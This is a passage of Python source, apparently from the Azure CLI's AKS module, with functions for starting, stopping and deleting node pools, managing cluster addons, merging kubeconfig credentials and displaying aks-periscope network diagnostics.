            "Node pool {} doesnt exist, use 'aks nodepool list' to get current node pool list".format(nodepool_name))

    instance = client.get(resource_group_name, cluster_name, nodepool_name)
    instance.power_state = PowerState(code="Stopped")
    headers = get_aks_custom_headers(aks_custom_headers)
    return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, cluster_name, nodepool_name, instance, headers=headers)
def aks_agentpool_start(cmd,    # pylint: disable=unused-argument
                        client,
                        resource_group_name,
                        cluster_name,
                        nodepool_name,
                        aks_custom_headers=None,
                        no_wait=False):
    """Start a stopped agent pool by setting its power state to 'Running'.

    :raises InvalidArgumentValueError: when the pool does not exist.
    """
    # Verify the pool exists before fetching/updating it.
    exists = any(pool.name.lower() == nodepool_name.lower()
                 for pool in client.list(resource_group_name, cluster_name))
    if not exists:
        raise InvalidArgumentValueError(
            "Node pool {} doesnt exist, use 'aks nodepool list' to get current node pool list".format(nodepool_name))

    instance = client.get(resource_group_name, cluster_name, nodepool_name)
    instance.power_state = PowerState(code="Running")
    headers = get_aks_custom_headers(aks_custom_headers)
    return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, cluster_name, nodepool_name, instance, headers=headers)
def aks_agentpool_delete(cmd,   # pylint: disable=unused-argument
                         client,
                         resource_group_name,
                         cluster_name,
                         nodepool_name,
                         no_wait=False):
    """Delete an agent pool from a managed cluster.

    Fails with a CLIError when no pool of that name exists.
    """
    wanted = nodepool_name.lower()
    pool_found = any(
        profile.name.lower() == wanted
        for profile in client.list(resource_group_name, cluster_name))
    if not pool_found:
        raise CLIError("Node pool {} doesnt exist, "
                       "use 'aks nodepool list' to get current node pool list".format(nodepool_name))
    return sdk_no_wait(no_wait, client.begin_delete,
                       resource_group_name, cluster_name, nodepool_name)
def aks_addon_list_available():
    """Return the catalogue of addons the CLI knows about.

    Each entry pairs the CLI-facing addon name with its human-readable
    description (looked up via the addon's internal key).
    """
    return [
        {"name": addon_name, "description": ADDONS_DESCRIPTIONS[addon_key]}
        for addon_name, addon_key in ADDONS.items()
    ]
def aks_addon_list(cmd, client, resource_group_name, name):  # pylint: disable=unused-argument
    """List all known addons with their enabled state on the given cluster.

    Returns a list of dicts with keys ``name`` (CLI addon name), ``api_key``
    (internal addon-profile key) and ``enabled``.
    """
    addon_profiles = client.get(resource_group_name, name).addon_profiles
    current_addons = []
    # Fix: the original loop variable was also called `name`, shadowing the
    # cluster-name parameter for the rest of the function body.
    for addon_name, addon_key in ADDONS.items():
        if addon_profiles and addon_key in addon_profiles:
            enabled = addon_profiles[addon_key].enabled
        else:
            enabled = False
        current_addons.append({
            "name": addon_name,
            "api_key": addon_key,
            "enabled": enabled
        })
    return current_addons
def aks_addon_show(cmd, client, resource_group_name, name, addon):  # pylint: disable=unused-argument
    """Show the profile (config + identity) of a single enabled addon.

    Raises CLIError when the addon is not enabled on the cluster.
    """
    profiles = client.get(resource_group_name, name).addon_profiles
    addon_key = ADDONS[addon]
    profile = profiles.get(addon_key) if profiles else None
    if profile is None or not profile.enabled:
        raise CLIError(f'Addon "{addon}" is not enabled in this cluster.')
    return {
        "name": addon,
        "api_key": addon_key,
        "config": profile.config,
        "identity": profile.identity
    }
def aks_addon_enable(cmd, client, resource_group_name, name, addon, workspace_resource_id=None,
                     subnet_name=None, appgw_name=None, appgw_subnet_prefix=None, appgw_subnet_cidr=None, appgw_id=None,
                     appgw_subnet_id=None,
                     appgw_watch_namespace=None, enable_sgxquotehelper=False, enable_secret_rotation=False, rotation_poll_interval=None,
                     no_wait=False, enable_msi_auth_for_monitoring=False):
    """Enable a single addon; thin pass-through to ``enable_addons``."""
    options = dict(
        workspace_resource_id=workspace_resource_id,
        subnet_name=subnet_name,
        appgw_name=appgw_name,
        appgw_subnet_prefix=appgw_subnet_prefix,
        appgw_subnet_cidr=appgw_subnet_cidr,
        appgw_id=appgw_id,
        appgw_subnet_id=appgw_subnet_id,
        appgw_watch_namespace=appgw_watch_namespace,
        enable_sgxquotehelper=enable_sgxquotehelper,
        enable_secret_rotation=enable_secret_rotation,
        rotation_poll_interval=rotation_poll_interval,
        no_wait=no_wait,
        enable_msi_auth_for_monitoring=enable_msi_auth_for_monitoring,
    )
    return enable_addons(cmd, client, resource_group_name, name, addon, **options)
def aks_addon_disable(cmd, client, resource_group_name, name, addon, no_wait=False):
    """Disable a single addon; thin wrapper over aks_disable_addons."""
    return aks_disable_addons(cmd, client, resource_group_name, name, addon, no_wait)
def aks_addon_update(cmd, client, resource_group_name, name, addon, workspace_resource_id=None,
                     subnet_name=None, appgw_name=None, appgw_subnet_prefix=None, appgw_subnet_cidr=None, appgw_id=None,
                     appgw_subnet_id=None,
                     appgw_watch_namespace=None, enable_sgxquotehelper=False, enable_secret_rotation=False, rotation_poll_interval=None,
                     no_wait=False, enable_msi_auth_for_monitoring=False):
    """Update the configuration of an addon that is already enabled.

    Refuses (CLIError) when the addon is not currently enabled, then
    re-runs ``enable_addons`` with ``check_enabled=False`` to apply the
    new settings.
    """
    addon_profiles = client.get(resource_group_name, name).addon_profiles
    addon_key = ADDONS[addon]
    currently_enabled = bool(addon_profiles) and \
        addon_key in addon_profiles and \
        addon_profiles[addon_key].enabled
    if not currently_enabled:
        raise CLIError(f'Addon "{addon}" is not enabled in this cluster.')
    options = dict(
        check_enabled=False,
        workspace_resource_id=workspace_resource_id,
        subnet_name=subnet_name,
        appgw_name=appgw_name,
        appgw_subnet_prefix=appgw_subnet_prefix,
        appgw_subnet_cidr=appgw_subnet_cidr,
        appgw_id=appgw_id,
        appgw_subnet_id=appgw_subnet_id,
        appgw_watch_namespace=appgw_watch_namespace,
        enable_sgxquotehelper=enable_sgxquotehelper,
        enable_secret_rotation=enable_secret_rotation,
        rotation_poll_interval=rotation_poll_interval,
        no_wait=no_wait,
        enable_msi_auth_for_monitoring=enable_msi_auth_for_monitoring,
    )
    return enable_addons(cmd, client, resource_group_name, name, addon, **options)
def aks_disable_addons(cmd, client, resource_group_name, name, addons, no_wait=False):
    """Disable one or more addons (comma-separated string) on a managed cluster.

    When the monitoring addon is being disabled and it was set up with
    AAD/MSI auth, the Data Collection Rule association is removed first so
    the DCR itself can be deleted afterwards.
    """
    instance = client.get(resource_group_name, name)
    subscription_id = get_subscription_id(cmd.cli_ctx)
    try:
        if addons == "monitoring" and CONST_MONITORING_ADDON_NAME in instance.addon_profiles and \
                instance.addon_profiles[CONST_MONITORING_ADDON_NAME].enabled and \
                CONST_MONITORING_USING_AAD_MSI_AUTH in instance.addon_profiles[CONST_MONITORING_ADDON_NAME].config and \
                str(instance.addon_profiles[CONST_MONITORING_ADDON_NAME].config[CONST_MONITORING_USING_AAD_MSI_AUTH]).lower() == 'true':
            # remove the DCR association because otherwise the DCR can't be deleted
            ensure_container_insights_for_monitoring(
                cmd,
                instance.addon_profiles[CONST_MONITORING_ADDON_NAME],
                subscription_id,
                resource_group_name,
                name,
                instance.location,
                remove_monitoring=True,
                aad_route=True,
                create_dcr=False,
                create_dcra=True
            )
    except TypeError:
        # Best-effort: a missing/None addon_profiles or config raises TypeError
        # during the checks above; the disable itself still proceeds.
        pass
    instance = _update_addons(
        cmd,
        instance,
        subscription_id,
        resource_group_name,
        name,
        addons,
        enable=False,
        no_wait=no_wait
    )
    # send the managed cluster representation to update the addon profiles
    return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, name, instance)
def aks_enable_addons(cmd, client, resource_group_name, name, addons, workspace_resource_id=None,
                      subnet_name=None, appgw_name=None, appgw_subnet_prefix=None, appgw_subnet_cidr=None, appgw_id=None, appgw_subnet_id=None,
                      appgw_watch_namespace=None, enable_sgxquotehelper=False, enable_secret_rotation=False, rotation_poll_interval=None, no_wait=False, enable_msi_auth_for_monitoring=False):
    """Enable one or more addons (comma-separated string) on a managed cluster.

    After updating the addon profiles, performs the addon-specific follow-up
    work: Container Insights onboarding (MSI/AAD or legacy route) and, for
    addons that need it, post-creation role assignments — in which case the
    update is awaited synchronously regardless of ``no_wait``.
    """
    instance = client.get(resource_group_name, name)
    # this is overwritten by _update_addons(), so the value needs to be recorded here
    msi_auth = True if instance.service_principal_profile.client_id == "msi" else False
    subscription_id = get_subscription_id(cmd.cli_ctx)
    instance = _update_addons(cmd, instance, subscription_id, resource_group_name, name, addons, enable=True,
                              workspace_resource_id=workspace_resource_id, enable_msi_auth_for_monitoring=enable_msi_auth_for_monitoring, subnet_name=subnet_name,
                              appgw_name=appgw_name, appgw_subnet_prefix=appgw_subnet_prefix, appgw_subnet_cidr=appgw_subnet_cidr, appgw_id=appgw_id, appgw_subnet_id=appgw_subnet_id, appgw_watch_namespace=appgw_watch_namespace,
                              enable_sgxquotehelper=enable_sgxquotehelper, enable_secret_rotation=enable_secret_rotation, rotation_poll_interval=rotation_poll_interval, no_wait=no_wait)
    if CONST_MONITORING_ADDON_NAME in instance.addon_profiles and instance.addon_profiles[CONST_MONITORING_ADDON_NAME].enabled:
        if CONST_MONITORING_USING_AAD_MSI_AUTH in instance.addon_profiles[CONST_MONITORING_ADDON_NAME].config and \
                str(instance.addon_profiles[CONST_MONITORING_ADDON_NAME].config[CONST_MONITORING_USING_AAD_MSI_AUTH]).lower() == 'true':
            if not msi_auth:
                raise ArgumentUsageError("--enable-msi-auth-for-monitoring can not be used on clusters with service principal auth.")
            else:
                # create a Data Collection Rule (DCR) and associate it with the cluster
                ensure_container_insights_for_monitoring(cmd, instance.addon_profiles[CONST_MONITORING_ADDON_NAME], subscription_id, resource_group_name, name, instance.location, aad_route=True, create_dcr=True, create_dcra=True)
        else:
            # monitoring addon will use legacy path
            ensure_container_insights_for_monitoring(cmd, instance.addon_profiles[CONST_MONITORING_ADDON_NAME], subscription_id, resource_group_name, name, instance.location, aad_route=False)
    monitoring = CONST_MONITORING_ADDON_NAME in instance.addon_profiles and instance.addon_profiles[
        CONST_MONITORING_ADDON_NAME].enabled
    ingress_appgw_addon_enabled = CONST_INGRESS_APPGW_ADDON_NAME in instance.addon_profiles and instance.addon_profiles[
        CONST_INGRESS_APPGW_ADDON_NAME].enabled
    # virtual-node profiles are keyed with the OS type appended (Linux only today)
    os_type = 'Linux'
    enable_virtual_node = False
    if CONST_VIRTUAL_NODE_ADDON_NAME + os_type in instance.addon_profiles:
        enable_virtual_node = True
    need_post_creation_role_assignment = monitoring or ingress_appgw_addon_enabled or enable_virtual_node
    if need_post_creation_role_assignment:
        # adding a wait here since we rely on the result for role assignment
        result = LongRunningOperation(cmd.cli_ctx)(
            client.begin_create_or_update(resource_group_name, name, instance))
        cloud_name = cmd.cli_ctx.cloud.name
        # mdm metrics supported only in Azure Public cloud so add the role assignment only in this cloud
        if monitoring and cloud_name.lower() == 'azurecloud':
            from msrestazure.tools import resource_id
            cluster_resource_id = resource_id(
                subscription=subscription_id,
                resource_group=resource_group_name,
                namespace='Microsoft.ContainerService', type='managedClusters',
                name=name
            )
            add_monitoring_role_assignment(result, cluster_resource_id, cmd)
        if ingress_appgw_addon_enabled:
            add_ingress_appgw_addon_role_assignment(result, cmd)
        if enable_virtual_node:
            # All agent pool will reside in the same vnet, we will grant vnet level Contributor role
            # in later function, so using a random agent pool here is OK
            random_agent_pool = result.agent_pool_profiles[0]
            if random_agent_pool.vnet_subnet_id != "":
                add_virtual_node_role_assignment(
                    cmd, result, random_agent_pool.vnet_subnet_id)
            # Else, the cluster is not using custom VNet, the permission is already granted in AKS RP,
            # we don't need to handle it in client side in this case.
    else:
        result = sdk_no_wait(no_wait, client.begin_create_or_update,
                             resource_group_name, name, instance)
    return result
def aks_rotate_certs(cmd, client, resource_group_name, name, no_wait=True):  # pylint: disable=unused-argument
    """Rotate the cluster's certificates; returns the long-running operation (no-wait by default)."""
    return sdk_no_wait(no_wait, client.begin_rotate_cluster_certificates, resource_group_name, name)
def _update_addons(cmd,  # pylint: disable=too-many-branches,too-many-statements
                   instance,
                   subscription_id,
                   resource_group_name,
                   name,
                   addons,
                   enable,
                   workspace_resource_id=None,
                   enable_msi_auth_for_monitoring=False,
                   subnet_name=None,
                   appgw_name=None,
                   appgw_subnet_prefix=None,
                   appgw_subnet_cidr=None,
                   appgw_id=None,
                   appgw_subnet_id=None,
                   appgw_watch_namespace=None,
                   enable_sgxquotehelper=False,
                   enable_secret_rotation=False,
                   disable_secret_rotation=False,
                   rotation_poll_interval=None,
                   no_wait=False):  # pylint: disable=unused-argument
    """Mutate ``instance.addon_profiles`` to enable or disable the given addons.

    ``addons`` is a comma-separated string of CLI addon names. Returns the
    mutated managed-cluster ``instance`` (also nulls out its service principal
    and AAD profiles so the subsequent PUT passes validation). Raises CLIError
    for unknown addon names, already-enabled addons (on enable) or
    not-installed addons (on disable).
    """
    # parse the comma-separated addons argument
    addon_args = addons.split(',')
    addon_profiles = instance.addon_profiles or {}
    os_type = 'Linux'
    # for each addons argument
    for addon_arg in addon_args:
        if addon_arg not in ADDONS:
            raise CLIError("Invalid addon name: {}.".format(addon_arg))
        addon = ADDONS[addon_arg]
        if addon == CONST_VIRTUAL_NODE_ADDON_NAME:
            # only linux is supported for now, in the future this will be a user flag
            addon += os_type
        # honor addon names defined in Azure CLI: normalize case-variant keys
        # already present in the profile map to the canonical spelling
        for key in list(addon_profiles):
            if key.lower() == addon.lower() and key != addon:
                addon_profiles[addon] = addon_profiles.pop(key)
        if enable:
            # add new addons or update existing ones and enable them
            addon_profile = addon_profiles.get(
                addon, ManagedClusterAddonProfile(enabled=False))
            # special config handling for certain addons
            if addon == CONST_MONITORING_ADDON_NAME:
                logAnalyticsConstName = CONST_MONITORING_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID
                if addon_profile.enabled:
                    raise CLIError('The monitoring addon is already enabled for this managed cluster.\n'
                                   'To change monitoring configuration, run "az aks disable-addons -a monitoring"'
                                   'before enabling it again.')
                if not workspace_resource_id:
                    # fall back to (or create) the subscription's default workspace
                    workspace_resource_id = ensure_default_log_analytics_workspace_for_monitoring(
                        cmd,
                        subscription_id,
                        resource_group_name)
                workspace_resource_id = sanitize_loganalytics_ws_resource_id(workspace_resource_id)
                addon_profile.config = {logAnalyticsConstName: workspace_resource_id}
                # NOTE(review): stored as a bool while other config values are
                # strings; consumers compare str(value).lower() == 'true', so
                # this works — confirm before normalizing.
                addon_profile.config[CONST_MONITORING_USING_AAD_MSI_AUTH] = enable_msi_auth_for_monitoring
            elif addon == (CONST_VIRTUAL_NODE_ADDON_NAME + os_type):
                if addon_profile.enabled:
                    raise CLIError('The virtual-node addon is already enabled for this managed cluster.\n'
                                   'To change virtual-node configuration, run '
                                   '"az aks disable-addons -a virtual-node -g {resource_group_name}" '
                                   'before enabling it again.')
                if not subnet_name:
                    raise CLIError(
                        'The aci-connector addon requires setting a subnet name.')
                addon_profile.config = {
                    CONST_VIRTUAL_NODE_SUBNET_NAME: subnet_name}
            elif addon == CONST_INGRESS_APPGW_ADDON_NAME:
                if addon_profile.enabled:
                    raise CLIError('The ingress-appgw addon is already enabled for this managed cluster.\n'
                                   'To change ingress-appgw configuration, run '
                                   f'"az aks disable-addons -a ingress-appgw -n {name} -g {resource_group_name}" '
                                   'before enabling it again.')
                # start from a fresh profile; only explicitly passed options are set
                addon_profile = ManagedClusterAddonProfile(
                    enabled=True, config={})
                if appgw_name is not None:
                    addon_profile.config[CONST_INGRESS_APPGW_APPLICATION_GATEWAY_NAME] = appgw_name
                if appgw_subnet_prefix is not None:
                    # legacy alias: --appgw-subnet-prefix writes the same key as --appgw-subnet-cidr
                    addon_profile.config[CONST_INGRESS_APPGW_SUBNET_CIDR] = appgw_subnet_prefix
                if appgw_subnet_cidr is not None:
                    addon_profile.config[CONST_INGRESS_APPGW_SUBNET_CIDR] = appgw_subnet_cidr
                if appgw_id is not None:
                    addon_profile.config[CONST_INGRESS_APPGW_APPLICATION_GATEWAY_ID] = appgw_id
                if appgw_subnet_id is not None:
                    addon_profile.config[CONST_INGRESS_APPGW_SUBNET_ID] = appgw_subnet_id
                if appgw_watch_namespace is not None:
                    addon_profile.config[CONST_INGRESS_APPGW_WATCH_NAMESPACE] = appgw_watch_namespace
            elif addon == CONST_OPEN_SERVICE_MESH_ADDON_NAME:
                if addon_profile.enabled:
                    raise CLIError('The open-service-mesh addon is already enabled for this managed cluster.\n'
                                   'To change open-service-mesh configuration, run '
                                   f'"az aks disable-addons -a open-service-mesh -n {name} -g {resource_group_name}" '
                                   'before enabling it again.')
                addon_profile = ManagedClusterAddonProfile(
                    enabled=True, config={})
            elif addon == CONST_CONFCOM_ADDON_NAME:
                if addon_profile.enabled:
                    raise CLIError('The confcom addon is already enabled for this managed cluster.\n'
                                   'To change confcom configuration, run '
                                   f'"az aks disable-addons -a confcom -n {name} -g {resource_group_name}" '
                                   'before enabling it again.')
                addon_profile = ManagedClusterAddonProfile(
                    enabled=True, config={CONST_ACC_SGX_QUOTE_HELPER_ENABLED: "false"})
                if enable_sgxquotehelper:
                    addon_profile.config[CONST_ACC_SGX_QUOTE_HELPER_ENABLED] = "true"
            elif addon == CONST_AZURE_KEYVAULT_SECRETS_PROVIDER_ADDON_NAME:
                if addon_profile.enabled:
                    raise CLIError('The azure-keyvault-secrets-provider addon is already enabled for this managed cluster.\n'
                                   'To change azure-keyvault-secrets-provider configuration, run '
                                   f'"az aks disable-addons -a azure-keyvault-secrets-provider -n {name} -g {resource_group_name}" '
                                   'before enabling it again.')
                addon_profile = ManagedClusterAddonProfile(
                    enabled=True, config={CONST_SECRET_ROTATION_ENABLED: "false", CONST_ROTATION_POLL_INTERVAL: "2m"})
                if enable_secret_rotation:
                    addon_profile.config[CONST_SECRET_ROTATION_ENABLED] = "true"
                if disable_secret_rotation:
                    addon_profile.config[CONST_SECRET_ROTATION_ENABLED] = "false"
                if rotation_poll_interval is not None:
                    addon_profile.config[CONST_ROTATION_POLL_INTERVAL] = rotation_poll_interval
                # NOTE(review): redundant with the assignment below — in this
                # branch `addon` equals this constant, so the next statement
                # writes the same key again.
                addon_profiles[CONST_AZURE_KEYVAULT_SECRETS_PROVIDER_ADDON_NAME] = addon_profile
            addon_profiles[addon] = addon_profile
        else:
            if addon not in addon_profiles:
                if addon == CONST_KUBE_DASHBOARD_ADDON_NAME:
                    # kube-dashboard may be absent on new clusters; treat as disabled
                    addon_profiles[addon] = ManagedClusterAddonProfile(
                        enabled=False)
                else:
                    raise CLIError(
                        "The addon {} is not installed.".format(addon))
            addon_profiles[addon].config = None
        addon_profiles[addon].enabled = enable
    instance.addon_profiles = addon_profiles
    # null out the SP and AAD profile because otherwise validation complains
    instance.service_principal_profile = None
    instance.aad_profile = None
    return instance
def aks_get_versions(cmd, client, location):  # pylint: disable=unused-argument
    """List the Kubernetes orchestrator versions available in the given location."""
    return client.list_orchestrators(location, resource_type='managedClusters')
def aks_get_os_options(cmd, client, location):  # pylint: disable=unused-argument
    """List the OS options available for managed clusters in the given location."""
    return client.get_os_options(location, resource_type='managedClusters')
def _print_or_merge_credentials(path, kubeconfig, overwrite_existing, context_name):
    """Merge an unencrypted kubeconfig into the file at the specified path, or print it to
    stdout if the path is "-".
    """
    # Special case for printing to stdout
    if path == "-":
        print(kubeconfig)
        return
    # ensure that at least an empty ~/.kube/config exists
    directory = os.path.dirname(path)
    if directory and not os.path.exists(directory):
        try:
            os.makedirs(directory)
        except OSError as ex:
            # tolerate a concurrent creator; re-raise anything else
            if ex.errno != errno.EEXIST:
                raise
    if not os.path.exists(path):
        # 0o600: kubeconfig holds credentials — owner read/write only
        with os.fdopen(os.open(path, os.O_CREAT | os.O_WRONLY, 0o600), 'wt'):
            pass
    # merge the new kubeconfig into the existing one via a temp file
    fd, temp_path = tempfile.mkstemp()
    additional_file = os.fdopen(fd, 'w+t')
    try:
        additional_file.write(kubeconfig)
        additional_file.flush()
        merge_kubernetes_configurations(
            path, temp_path, overwrite_existing, context_name)
    except yaml.YAMLError as ex:
        logger.warning(
            'Failed to merge credentials to kube config file: %s', ex)
    finally:
        additional_file.close()
        os.remove(temp_path)
def _handle_merge(existing, addition, key, replace):
    """Merge the list under ``key`` (clusters/users/contexts) from ``addition``
    into ``existing``, in place.

    On a name collision: identical entries (or ``replace=True``) silently
    replace the old one; otherwise the user is prompted (skipped without a
    TTY) and a CLIError is raised if they decline.
    """
    if not addition[key]:
        return
    if existing[key] is None:
        existing[key] = addition[key]
        return
    for i in addition[key]:
        # NOTE(review): removing from existing[key] while iterating it can
        # skip the following element; harmless when names are unique (at most
        # one match) — confirm that invariant holds for kubeconfig files.
        for j in existing[key]:
            if i['name'] == j['name']:
                if replace or i == j:
                    existing[key].remove(j)
                else:
                    from knack.prompting import prompt_y_n
                    msg = 'A different object named {} already exists in your kubeconfig file.\nOverwrite?'
                    overwrite = False
                    try:
                        overwrite = prompt_y_n(msg.format(i['name']))
                    except NoTTYException:
                        # non-interactive session: fall through to the error below
                        pass
                    if overwrite:
                        existing[key].remove(j)
                    else:
                        msg = 'A different object named {} already exists in {} in your kubeconfig file.'
                        raise CLIError(msg.format(i['name'], key))
        existing[key].append(i)
def load_kubernetes_configuration(filename):
    """Load and parse a kubeconfig YAML file.

    Returns the parsed document (None for an empty file, per yaml.safe_load).
    Raises CLIError when the file does not exist or cannot be parsed.
    """
    try:
        with open(filename) as stream:
            return yaml.safe_load(stream)
    except (IOError, OSError) as ex:
        if getattr(ex, 'errno', 0) == errno.ENOENT:
            raise CLIError('{} does not exist'.format(filename)) from ex
        # Fix: other OS errors (e.g. permission denied) were previously
        # swallowed, making the function return None — which callers treat as
        # an empty kubeconfig and may then overwrite. Re-raise instead.
        raise
    except (yaml.parser.ParserError, UnicodeDecodeError) as ex:
        raise CLIError('Error parsing {} ({})'.format(filename, str(ex))) from ex
def merge_kubernetes_configurations(existing_file, addition_file, replace, context_name=None):
    """Merge the kubeconfig in ``addition_file`` into ``existing_file``.

    Optionally renames the incoming context to ``context_name``, renames
    admin contexts with an ``-admin`` suffix, merges clusters/users/contexts,
    warns when the resulting file is not owner-only readable, and writes the
    merged document back to ``existing_file``.
    """
    existing = load_kubernetes_configuration(existing_file)
    addition = load_kubernetes_configuration(addition_file)
    # Fix: validate *before* touching the parsed object — previously a None
    # addition (e.g. empty file) crashed with TypeError on the subscripts
    # below, before the explicit None check was ever reached.
    if addition is None:
        raise CLIError(
            'failed to load additional configuration from {}'.format(addition_file))
    if context_name is not None:
        addition['contexts'][0]['name'] = context_name
        addition['contexts'][0]['context']['cluster'] = context_name
        addition['clusters'][0]['name'] = context_name
        addition['current-context'] = context_name
    # rename the admin context so it doesn't overwrite the user context
    for ctx in addition.get('contexts', []):
        try:
            if ctx['context']['user'].startswith('clusterAdmin'):
                admin_name = ctx['name'] + '-admin'
                addition['current-context'] = ctx['name'] = admin_name
                break
        except (KeyError, TypeError):
            continue
    if existing is None:
        # no (or empty) existing kubeconfig: take the addition wholesale
        existing = addition
    else:
        _handle_merge(existing, addition, 'clusters', replace)
        _handle_merge(existing, addition, 'users', replace)
        _handle_merge(existing, addition, 'contexts', replace)
        existing['current-context'] = addition['current-context']
    # check that ~/.kube/config is only read- and writable by its owner
    if platform.system() != 'Windows':
        existing_file_perms = "{:o}".format(
            stat.S_IMODE(os.lstat(existing_file).st_mode))
        if not existing_file_perms.endswith('600'):
            logger.warning('%s has permissions "%s".\nIt should be readable and writable only by its owner.',
                           existing_file, existing_file_perms)
    with open(existing_file, 'w+') as stream:
        yaml.safe_dump(existing, stream, default_flow_style=False)
    current_context = addition.get('current-context', 'UNKNOWN')
    msg = 'Merged "{}" as current context in {}'.format(
        current_context, existing_file)
    print(msg)
def cloud_storage_account_service_factory(cli_ctx, kwargs):
    """Build a CloudStorageAccount client from factory kwargs.

    Consumes (pops) account_name/account_key/sas_token/connection_string from
    ``kwargs``; connection_string is discarded, the rest configure the client.
    """
    from azure.cli.core.profiles import ResourceType, get_sdk
    t_cloud_storage_account = get_sdk(
        cli_ctx, ResourceType.DATA_STORAGE, 'common#CloudStorageAccount')
    account_name, account_key, sas_token = (
        kwargs.pop('account_name', None),
        kwargs.pop('account_key', None),
        kwargs.pop('sas_token', None),
    )
    kwargs.pop('connection_string', None)  # consumed but unused by this factory
    return t_cloud_storage_account(account_name, account_key, sas_token)
def get_storage_account_from_diag_settings(cli_ctx, resource_group_name, name):
    """Return the storage account id from the cluster's first diagnostic
    setting, or None (with a message) when no diagnostic settings exist."""
    from azure.mgmt.monitor import MonitorManagementClient
    diag_settings_client = get_mgmt_service_client(
        cli_ctx, MonitorManagementClient).diagnostic_settings
    subscription_id = get_subscription_id(cli_ctx)
    aks_resource_id = '/subscriptions/{0}/resourceGroups/{1}/providers/Microsoft.ContainerService' \
        '/managedClusters/{2}'.format(subscription_id,
                                      resource_group_name, name)
    diag_settings = diag_settings_client.list(aks_resource_id)
    if diag_settings.value:
        # only the first diagnostic setting is consulted
        return diag_settings.value[0].storage_account_id
    print("No diag settings specified")
    return None
def display_diagnostics_report(temp_kubeconfig_path):   # pylint: disable=too-many-statements
    """Poll aks-periscope diagnostic results via kubectl and print them.

    Lists the cluster's Ready nodes, then polls (up to ``max_retry`` rounds)
    for one 'apd' custom resource per ready node in the aks-periscope
    namespace, reads each node's network config/outbound status, and renders
    both as tables. Requires kubectl on PATH.
    """
    if not which('kubectl'):
        raise CLIError('Can not find kubectl executable in PATH')
    nodes = subprocess.check_output(
        ["kubectl", "--kubeconfig", temp_kubeconfig_path,
         "get", "node", "--no-headers"],
        universal_newlines=True)
    logger.debug(nodes)
    node_lines = nodes.splitlines()
    # node name -> whether its diagnostics have been collected yet
    ready_nodes = {}
    for node_line in node_lines:
        columns = node_line.split()
        logger.debug(node_line)
        if columns[1] != "Ready":
            logger.warning(
                "Node %s is not Ready. Current state is: %s.", columns[0], columns[1])
        else:
            ready_nodes[columns[0]] = False
    logger.debug('There are %s ready nodes in the cluster',
                 str(len(ready_nodes)))
    if not ready_nodes:
        logger.warning(
            'No nodes are ready in the current cluster. Diagnostics info might not be available.')
    network_config_array = []
    network_status_array = []
    apds_created = False
    max_retry = 10
    for retry in range(0, max_retry):
        if not apds_created:
            # phase 1: wait until an apd resource exists for every ready node
            apd = subprocess.check_output(
                ["kubectl", "--kubeconfig", temp_kubeconfig_path, "get",
                 "apd", "-n", "aks-periscope", "--no-headers"],
                universal_newlines=True
            )
            apd_lines = apd.splitlines()
            if apd_lines and 'No resources found' in apd_lines[0]:
                apd_lines.pop(0)
            print("Got {} diagnostic results for {} ready nodes{}\r".format(len(apd_lines),
                                                                            len(ready_nodes),
                                                                            '.' * retry), end='')
            if len(apd_lines) < len(ready_nodes):
                time.sleep(3)
            else:
                apds_created = True
                print()
        else:
            # phase 2: pull network config/status from each node's apd resource
            for node_name in ready_nodes:
                if ready_nodes[node_name]:
                    # already collected for this node
                    continue
                apdName = "aks-periscope-diagnostic-" + node_name
                try:
                    network_config = subprocess.check_output(
                        ["kubectl", "--kubeconfig", temp_kubeconfig_path,
                         "get", "apd", apdName, "-n",
                         "aks-periscope", "-o=jsonpath={.spec.networkconfig}"],
                        universal_newlines=True)
                    logger.debug('Dns status for node %s is %s',
                                 node_name, network_config)
                    network_status = subprocess.check_output(
                        ["kubectl", "--kubeconfig", temp_kubeconfig_path,
                         "get", "apd", apdName, "-n",
                         "aks-periscope", "-o=jsonpath={.spec.networkoutbound}"],
                        universal_newlines=True)
                    logger.debug('Network status for node %s is %s',
                                 node_name, network_status)
                    if not network_config or not network_status:
                        # data not populated yet; back off and retry the whole node loop
                        print("The diagnostics information for node {} is not ready yet. "
                              "Will try again in 10 seconds.".format(node_name))
                        time.sleep(10)
                        break
                    network_config_array += json.loads(
                        '[' + network_config + ']')
                    network_status_object = json.loads(network_status)
                    network_status_array += format_diag_status(
                        network_status_object)
                    ready_nodes[node_name] = True
                except subprocess.CalledProcessError as err:
                    raise CLIError(err.output)
    print()
    if network_config_array:
        print("Below are the network configuration for each node: ")
        print()
        print(tabulate(network_config_array, headers="keys", tablefmt='simple'))
        print()
    else:
        logger.warning("Could not get network config. "
                       "Please run 'az aks kanalyze' command later to get the analysis results.")
    if network_status_array:
        print("Below are the network connectivity results for each node:")
        print()
        print(tabulate(network_status_array, headers="keys", tablefmt='simple'))
    else:
        logger.warning("Could not get networking status. "
                       "Please run 'az aks kanalyze' command later to get the analysis results.")
def format_diag_status(diag_status):
    """Colorize each entry's Status field in place (red on 'Error:', else green)
    and return the same list."""
    for entry in diag_status:
        status = entry["Status"]
        if not status:
            continue
        color = colorama.Fore.RED if "Error:" in status else colorama.Fore.GREEN
        entry["Status"] = f'{color}{status}{colorama.Style.RESET_ALL}'
    return diag_status
def format_bright(msg):
    """Wrap msg in ANSI bold + colorama BRIGHT, resetting styles afterwards."""
    return '\033[1m{}{}{}'.format(colorama.Style.BRIGHT, msg, colorama.Style.RESET_ALL)
def format_hyperlink(the_link):
    """Render a link bold and blue (ANSI + colorama), resetting styles afterwards."""
    return '\033[1m{}{}{}{}'.format(
        colorama.Style.BRIGHT, colorama.Fore.BLUE, the_link, colorama.Style.RESET_ALL)
def get_aks_custom_headers(aks_custom_headers=None):
    """Parse a comma-separated ``key=value`` list into a headers dict.

    Returns an empty dict for None or "". Raises CLIError when a pair has no
    '=' separator. Values may themselves contain '=' (e.g. base64 padding):
    only the first '=' splits key from value — a generalization over the old
    exact-one-'=' rule, which rejected such values.
    """
    headers = {}
    if not aks_custom_headers:
        return headers
    for pair in aks_custom_headers.split(','):
        key, sep, value = pair.partition('=')
        if not sep:
            raise CLIError('custom headers format is incorrect')
        headers[key] = value
    return headers
def _put_managed_cluster_ensuring_permission(
    cmd,     # pylint: disable=too-many-locals,too-many-statements,too-many-branches
    client,
    subscription_id,
    resource_group_name,
    name,
    managed_cluster,
    monitoring_addon_enabled,
    ingress_appgw_addon_enabled,
    virtual_node_addon_enabled,
